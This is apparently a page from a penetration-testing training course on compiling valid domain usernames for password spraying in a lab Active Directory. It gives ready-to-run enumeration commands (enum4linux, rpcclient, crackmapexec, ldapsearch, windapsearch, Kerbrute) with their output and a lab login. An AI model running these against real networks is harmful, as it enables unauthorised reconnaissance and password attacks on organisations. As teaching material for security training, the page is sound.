Making a Target User List
To mount a successful password spraying attack, we first need a list of valid domain users to attempt to authenticate with. There are several ways that we can gather a target list of valid users:
By leveraging an SMB NULL session to retrieve a complete list of domain users from the domain controller
Utilizing an LDAP anonymous bind to query LDAP anonymously and pull down the domain user list
Using a tool such as
Kerbruteto validate users utilizing a word list from a source such as the statistically-likely-usernames GitHub repo, or gathered by using a tool such as linkedin2username to create a list of potentially valid usersUsing a set of credentials from a Linux or Windows attack system either provided by our client or obtained through another means such as LLMNR/NBT-NS response poisoning using
Responderor even a successful password spray using a smaller wordlist
SMB Null Sessions
Using enum4linux
$ enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
administrator
guest
krbtgt
lab_adm
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
<SNIP>Using rpcclient
$ rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]
user:[avazquez] rid:[0x458]
<SNIP>Using CrackMapExec --users Flag
$ crackmapexec smb 172.16.5.5 --users
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2021-12-21 14:10:56.859064
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-02-22 14:48:26.653366
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 0 baddpwdtime: 2022-02-17 22:59:22.684613
<SNIP>LDAP Anonymous
Using ldapsearch
rednorth@htb[/htb]$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
guest
ACADEMY-EA-DC01$
ACADEMY-EA-MS01$
ACADEMY-EA-WEB01$
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
<SNIP>Using windapsearch
rednorth@htb[/htb]$ ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 2906 users:
cn: Guest
cn: Htb Student
userPrincipalName: htb-student@inlanefreight.local
cn: Annie Vazquez
userPrincipalName: avazquez@inlanefreight.local
cn: Paul Falcon
userPrincipalName: pfalcon@inlanefreight.local
cn: Fae Anthony
userPrincipalName: fanthony@inlanefreight.local
cn: Walter Dillard
userPrincipalName: wdillard@inlanefreight.local
<SNIP>Kerbrute
$ kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:16:11 > Using KDC(s):
2022/02/17 22:16:11 > 172.16.5.5:88
2022/02/17 22:16:11 > [+] VALID USERNAME: jjones@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: sbrown@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: tjohnson@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: jwilson@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: bdavis@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: njohnson@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: asanchez@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: dlewis@inlanefreight.local
2022/02/17 22:16:11 > [+] VALID USERNAME: ccruz@inlanefreight.local
<SNIP>Credentialed Enumeration
$ sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
[sudo] password for htb-student:
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\htb-student:Academy_student_AD!
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 1 baddpwdtime: 2022-02-23 21:43:35.059620
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2021-12-21 14:10:56.859064
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-02-22 14:48:26.653366
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 20 baddpwdtime: 2022-02-17 22:59:22.684613
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\pfalcon badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
<SNIP>Last updated